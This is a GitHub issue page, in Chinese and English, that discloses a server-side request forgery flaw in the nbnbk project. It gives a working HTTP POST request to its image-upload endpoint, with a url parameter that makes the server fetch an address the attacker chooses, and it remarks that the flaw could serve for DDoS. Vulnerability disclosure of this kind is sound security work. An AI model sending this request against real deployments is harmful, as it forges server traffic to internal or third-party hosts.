Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

🛡️ SSRF vulnerability in nbnbk #4

Open
en0th opened this issue Mar 4, 2022 · 0 comments
Open

🛡️ SSRF vulnerability in nbnbk #4

en0th opened this issue Mar 4, 2022 · 0 comments

Comments

@en0th
Copy link

en0th commented Mar 4, 2022

nbnbk 存在SSRF漏洞

SSRF vulnerability in nbnbk

0x00 前言 Preface

该漏洞可以伪装服务器发送请求,但没有回显,危害较小,可以做为 DDOS 使用。

漏洞存在版本:default

This bug can disguise the server from sending requests, but it does not echo and is less harmful and can be used as a DDOS.

Vulnerability Existing Version: default

0x01 漏洞复现 Vulnerability Reproduction

POST /api/Image/curl_upload_image HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

url=http://127.0.0.1:8088&file[tmp_name]=1&file[type]=1&file[name]=1

替换 url 来进行 SSRF 攻击,该漏洞没有回显。发送请求后可以看到服务器已经向外请求了。
Replace url for `SSRF'attack, the vulnerability is not echoed. After sending the request, you can see that the server has already made an outgoing request.

image-20220304144417834

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant